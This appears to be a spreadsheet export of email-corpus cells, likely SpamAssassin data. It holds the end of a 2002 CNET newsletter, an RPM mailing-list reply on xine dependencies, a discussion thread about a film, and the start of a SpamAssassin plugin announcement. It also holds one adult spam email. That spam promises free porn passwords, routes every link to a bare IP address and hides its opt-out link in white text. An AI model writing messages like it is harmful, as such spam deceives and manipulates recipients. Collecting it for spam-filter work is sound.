 &lt;/table&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;font face=3D"Arial, Helvetica"&gt;=09=09=09
 &lt;img src=3D"http://www.cnet.com/i/nl/sh/sub_feat.gif" alt=3D"Review" width=
 =3D"150" height=3D"19" border=3D"0"&gt;&lt;br&gt;
 &lt;img src=3D"http://home.cnet.com/i/nl/rule.gif" width=3D"410" height=3D"8" =
 border=3D"0"&gt;&lt;br&gt;
 &lt;!-- Reviews gif=20
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D93 align=3Dleft&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/p/082801ie6.jpg" width=3D"8=
 5" height=3D"110" border=3D"0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 End Reviews gif --&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D74-VAV8IZZSNagNWyQRYG8Y0gS=
 PZxnR" &gt;This week in Internet Services&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Big broadband providers are ticked off about Wi-Fi hot spots.
 In fact, both AT&amp;amp;T Broadband and Time Warner Cable have begun
 campaigns to stop subscribers from sharing their accounts with
 others at no charge. Also this week: we review Yahoo"s new
 dial-up service.
 &lt;/font&gt;&lt;p&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D89-h28bQ-J1Q02IDqlkUMBXB6W=
 5WWcR" &gt;Is your ISP safe from hackers?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Surely, the folks who run your ISP have thought good and hard
 about security issues, but should you count on their skills to
 ward off intruders? Not wise, says our ISP expert. In this
 week"s column, Dan Tynan takes security matters into his own
 hands and shows you how to protect yourself.
 &lt;/font&gt;&lt;p&gt;
 &lt;p&gt;
 &lt;!-- Scoop --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_scoop.gif" width=3D150 height=
 =3D19 alt=3D"The Scoop"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D9e-tWQoQtMQJbivW7oHSCN0=
 U7nQUDRR" &gt;Domain names&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 A domain name provides an online identity and contact point for
 your business, organization, or project. Almost every transaction
 on the Internet relies upon a domain name to conduct commerce,
 display Web pages, deliver e-mail, and more. Secure your own
 domain here.
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- End Scoop --&gt;
 &lt;br&gt;
 &lt;p&gt;
 &lt;!-- this week --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_news.gif" width=3D150 height=3D=
 19 alt=3D"This Week in News"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Db3-QHzxQYKTqPwMqy4AE64q=
 DAwrPGFR" &gt;&lt;b&gt;Comcast shareholders bless AT&amp;T deal&lt;/b&gt;&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Comcast shareholders on Wednesday approved the cable television
 company's $27 billion purchase of larger rival AT&amp;T Broadband,
 which will create the nation's largest cable TV operator with
 more than 22 million customers.
 &lt;/font&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc8-2lPnQWOzdKSAi4xMKE-n=
 Fr99H29R" &gt;U.S. Attorney investigates Qwest=20
 &lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Qwest Communications International, the number-four U.S. local
 telephone carrier, said Wednesday that the U.S. Attorney's office
 in Denver has begun a criminal investigation of the company.
 &lt;/font&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;!-- CNET WEEKLY tip --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_tip.gif" width=3D150 height=3D1=
 9 alt=3D"Tip of the Week"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Ddd-tpm0QzWd3KwOlvmGZP85=
 eXsJh-uR" &gt;Antivirus guide 2002&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 You want to protect your PC, of course. But how? We"ll walk you
 through some of your best antivirus options. Our reviewers
 looked at 10 top antivirus products and sorted out the features
 and levels of protection found in each.
 &lt;br&gt;
 &lt;/font&gt;
 &lt;br&gt;
 &lt;p&gt;
 &lt;img src=3D"http://home.cnet.com/i/dp/oncnet.gif" alt=3D"On the CNET Networ=
 k" width=3D"172" height=3D"14" border=3D"0"&gt;&lt;br&gt;
 &lt;img src=3D"http://home.cnet.com/i/nl/rule.gif" width=3D"410" height=3D"8" =
 border=3D"0"&gt;&lt;br&gt;
 &lt;table width=3D"410" cellpadding=3D0 cellspacing=3D0 border=3D0&gt;&lt;tr valign=
 =3Dtop&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Df2-OZVTQUwWCP2AgW10pvV=
 di5Z7edsR" &gt;Tech Trends&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D07-HqCzI5rq9XaOumHiqzU=
 brvLkiDZR" &gt;Hardware&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D1c-cs_iIFr43L2_OlNn9kg=
 Ga2oXqGdR" &gt;Software&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D31-V_YRIjMsDVYpq0uyLxj=
 kqVAXXbcR" &gt;Shopping&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D46-19zwInpDS3qrjRaa1cN=
 0535V0YiR" &gt;Downloads&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D5c-BnjPIZnPbrLr5mC53xl=
 Zk0f-IonR" &gt;News&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D71-GwdUIEZcfByHz91qwuB=
 Xvl3NU2rR" &gt;Investing&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D86-8fH1QCJonygfpsvSjae=
 TldfVpfRR" &gt;Electronics&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D9b-7-TFQSIo2xWnzLn0dAV=
 J9PZAKTFR" &gt;Web Building&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Db0-NZmfQQJr-Y4bf_XdxQM=
 KtNX8PQ9R" &gt;Help &amp; How-Tos&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc5-8BcDQzOaFArP3YTzSRO=
 UJEymxquR" &gt;Internet&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dda-dT8jQUPq_yH_t95bjsM=
 VKpv3DxsR" &gt;Games&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Def-04uYQmkHvcw52NIqBxD=
 VAmoBamZR" &gt;Message Boards&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D04-k9W0IFQXF_UJZRS98Bb=
 BL7kOi_dR" &gt;CNET Radio&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D19-BLe0I2rXOlvEd1FKMZ2=
 Fz8IR7XcR" &gt;Music Center&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!-- Begin search box --&gt;
 =09&lt;table border=3D"0" cellpadding=3D"1" cellspacing=3D"0" width=3D"90%"&gt;&lt;t=
 r&gt;&lt;td bgcolor=3D"#CCCCCC"&gt;
 =09&lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"100%"&gt;&lt;form m=
 ethod=3D"GET" action=3D"http://www.search.com/redirect"&gt;
 =09&lt;tr align=3Dcenter valign=3Dmiddle bgcolor=3D"#FFFFFF"&gt;
 =09&lt;td height=3D40 align=3Dright nowrap&gt; &lt;/td&gt;
 =09&lt;td class=3D"f"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;Search&lt;/b=
 &gt; &lt;/font&gt;&lt;/td&gt;
 =09&lt;td align=3Dleft&gt;&lt;input type=3D"Text" class=3D"f" name=3D"qt" size=3D"12=
 " maxlength=3D"255"&gt;&lt;/td&gt;
 =09&lt;td&gt; &lt;select name=3D"target"&gt;
 =09&lt;option value=3D"http://internet.search.com/search?tag=3Dex.is.lrg.srch.=
 is&amp;sortby=3Dcompany%252Cservice&amp;join=3Dand&amp;keywords=3D%25%25q%25%25" select=
 ed&gt; Internet Services
 =09&lt;option value=3D"http://cnet.search.com/search?edition=3Dcnet&amp;cat=3D103&amp;=
 timeout=3D3&amp;tag=3Dex.ws.sr.srch_top.cnet"&gt;All CNET
 =09&lt;option value=3D"http://www.search.com/search?channel=3D1&amp;tag=3Dex.ws.sr=
 .srch_top.web"&gt;The Web=09
 =09&lt;/select&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 =09&lt;td&gt; &lt;input name=3D'search' type=3D'submit' class=3D'f' value=3D' Go! '&gt;=
 =20
 =09&lt;input type=3D"hidden" name=3D"tt" value=3D"st.sw.8888.sbsr"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;&lt;/form&gt;
 =09&lt;/table&gt;=20
 =09&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;=20
 &lt;!-- End search box --&gt;
 &lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"8" border=3D"=
 0"&gt;&lt;br&gt;
 =09=09&lt;/td&gt;
 =09&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Thin grey line --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D599 bgcolor=3D"#CCCCCC"&gt;&lt;img src=3D"http://home.cnet.com/b.g=
 if" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D600 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.g=
 if" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"599" bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://www.cnet.com/b.gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#eeeeee" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"575"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"10"&gt;&lt;br&gt;
 &lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dqqqqqqqqqq-cnet-news=
 letters@spamassassin.taint.org&amp;brand=3Dcnet'&gt;
 &lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width=3D"375" height=3D"=
 18" border=3D"0" alt=3D"Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;=
 br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletter=
 s@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF=3D'http://clickthru.online.com/Click?q=3D2f-hYfFzInu3VK3rW5=
 M2V22j7XLQtJgy9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dqqqqqqqqqq-cne=
 t-newsletters@spamassassin.taint.org&amp;brand=3Dcnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D44-9nxfIZUtYw=
 3DuzAEMLKlXBDgnVnR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D59-y53oIEnthwdesBklp=
 W-B_KMqztrR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=3D"8"&gt;&lt;/td=
 &gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"601"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#ffcc00" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"10" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"37"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D6f-3x79IO=
 LAbHgqPca3RXvLF34ULXPR" &gt;&lt;img src=3D"http://www.cnet.com/i/dp/smrb.gif" wid=
 th=3D"37" height=3D"37" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D"563" nowrap&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D84-CCOyQ60TyzpZTgMZsihsBSW=
 gp7dR" &gt;&lt;font color=3D"#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D99-4mtyQAdTjI4jtH02H3f2jvr=
 qULcR" &gt;&lt;font color=3D"#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dae-jOE6QMB1Lkl2_0N8-mhe2RY=
 EVuRR" &gt;&lt;font color=3D"#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc3-x1yCQJLx-_UPW2fZ5znP-Fd=
 WuuFR" &gt;&lt;font color=3D"#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd8-XW73QWLWI7jud7imkSWreAg=
 RDc9R" &gt;&lt;font color=3D"#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D=
 "1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height=3D"25"&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;tab=
 le width=3D100% border=3D0 cellspacing=3D2 cellpadding=3D1&gt; &lt;tr valign=3Dbo=
 ttom&gt; &lt;td width=3D75% height=3D31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=3DArial, He=
 lvetica, sans-serif size=3D2&gt;    Copyright 2002 CNET Networks, Inc. All rig=
 hts reserved.    &lt;/font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=3D31 valign=3Dtop&gt; &lt;div al=
 ign=3Dright&gt; &lt;img src=3D"http://gserv-cnet.zdnet.com/clear/outbound.gif?APP=
 ID=3D2&amp;EMID=3D25136487&amp;NL=3De425&amp;ISSUE=3D2002-07-11" height=3D1 width=3D1&gt; =
    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, san=
 s-serif size=3D2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Dee-Z=
 bxW-CDsh4678RHPr7GzhmjzGRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Xine dependencies
</t>
  </si>
  <si>
    <t xml:space="preserve">On 04 Oct 2002 22:25:31 -0400, QuaffA Pint &lt;quaffapint@clippersoft.net&gt; wrote:
 &gt; On a RH 8 box, I'm trying to install your package
 &gt; xine-0.9.13-fr5.i386.rpm, I keep running into dependency problems.  I've
 &gt; tried to install the dev and lib rpm's as well and they error out with
 &gt; dependency problems on each other (they each want something from the
 &gt; other's package).
 &gt; 
 &gt; I've tried the --without options, but still end up with (similar for the
 &gt; regular package),
 &gt; 
 &gt; 	glut is needed by xine-libs-0.9.13-fr5
 &gt;         aalib is needed by xine-libs-0.9.13-fr5
 &gt;         lirc is needed by xine-libs-0.9.13-fr5
 &gt;         libaa.so.1 is needed by xine-libs-0.9.13-fr5
 &gt;         libglut.so.3 is needed by xine-libs-0.9.13-fr5
 &gt; 
 &gt; What am I missing here?
     "apt-get install xine".  It'll find all these.  Oh, and I'm told that Redhat 8.0 will also suggest things like this for ya. (Not apt, but the actual package names you need)
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 Just machines, to make big decisions- programmed by fellas with
 compassion and vision.  We'll be clean when that work is done;
 Eternally free and eternally young.  Linux.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Isn't this the story where someone's "Dream" has the ability to change
 reality -- then you find the whole world is their dream?
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; Sent: Monday, September 09, 2002 4:26 AM
 &gt; To: John Evdemon
 &gt; Cc: fork@spamassassin.taint.org
 &gt; Subject: RE: Recommended Viewing
 &gt; 
 &gt; Agreed, completely.  I totally grokked the notion of unintened
 consequence
 &gt; with the original.
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 John
 &gt; Evdemon
 &gt; Sent: Monday, September 09, 2002 7:03 AM
 &gt; To: Fork@xent.com
 &gt; Subject: Re: Recommended Viewing
 &gt; 
 &gt; 
 &gt; On 8 Sep 2002 at 22:15, Geege Schuman wrote:
 &gt; 
 &gt; &gt; who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen
 &gt; &gt; the original?
 &gt; &gt;
 &gt; By "original" if you are referring to the old PBS version, I liked
 that
 &gt; version much better.  Much more thought provoking.
 &gt; 
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: xxx site passwords 432114108765443333222222
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#FFFFFF&gt;
 &lt;center&gt;
   &lt;b&gt;
   &lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;&lt;font color="#FF0000" size="6"&gt;STOP 
   PAYING FOR PORN&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;TABLE WIDTH=470 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
       &lt;TD COLSPAN=2&gt; 
       &lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;
       &lt;IMG SRC="http://157.237.128.20/art/hcfreepornpass_01.gif" border="0" width="470" height="52"&gt;&lt;/a&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
       &lt;TD&gt; 
       &lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;
       &lt;IMG SRC="http://157.237.128.20/art/hcfreepornpass_02.jpg" border="0" width="281" height="242"&gt;&lt;/a&gt;&lt;/TD&gt;
       &lt;TD&gt; 
       &lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;
       &lt;IMG SRC="http://157.237.128.20/art/hcfreepornpass_03.gif" border="0" width="189" height="242"&gt;&lt;/a&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
       &lt;TD COLSPAN=2&gt; 
       &lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;
       &lt;IMG SRC="http://157.237.128.20/art/hcfreepornpass_04.gif" border="0" width="470" height="56"&gt;&lt;/a&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
   &lt;b&gt;
   &lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;You will 
   be amazed how easy it is!!!!&lt;/a&gt;&lt;/b&gt; &lt;br&gt;
   &lt;br&gt;
   &lt;b&gt; 
   &lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;GETTING 
   FREE XXX PASSWORDS IS EASY,&lt;br&gt;
   WE'LL SHOW YOU HOW!!!&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;font color="#FF0000" size="4"&gt;
   &lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;CLICK 
   HERE &lt;br&gt;
   TO GET YOUR FREE PASSWORDS&lt;/a&gt;&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;a target="_blank" href="http://157.237.128.20/morefreesites/freesites.html"&gt;
   &lt;/a&gt; 
 &lt;/center&gt;
 &lt;table border="0" cellpadding="6" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" bgcolor="#000000" height="100%"&gt;
 &lt;tr&gt;
 &lt;td width="100%" bgcolor="#FFFFFF"&gt;
 &lt;br&gt;
 &amp;nbsp;&lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt;Removal Instructions:&lt;br&gt;
 &lt;/b&gt;&lt;br&gt;
 You have received this advertisement because you have opted in to receive free adult internet offers and specials through our affiliated websites. If you do not wish to receive further emails or have received the email in error you may opt-out of our database here: &lt;/font&gt;&lt;font color="#FFFFFF" face="Arial" size="2"&gt; &lt;a href="http://157.237.128.20/optout"&gt;http://157.237.128.20/optout&lt;/a&gt;&lt;/font&gt;&lt;font face="Arial" size="2"&gt; . Please allow 24hours for removal.&lt;br&gt;
 &lt;br&gt;
 This e-mail is sent in compliance with the Information Exchange Promotion and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 'removal' instruction.&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 432114108765443333222222
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Spamassassin webinterface for Communigate using PHP released
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 akitogo is happy to announce that Jochen Becker has just finished a small
 nice PHP interface which integrates Spammassassin in the webuser interface
 from Communigate.
 It currently tested with RedHat,PHP and CGPro
 What is does:
 -------------
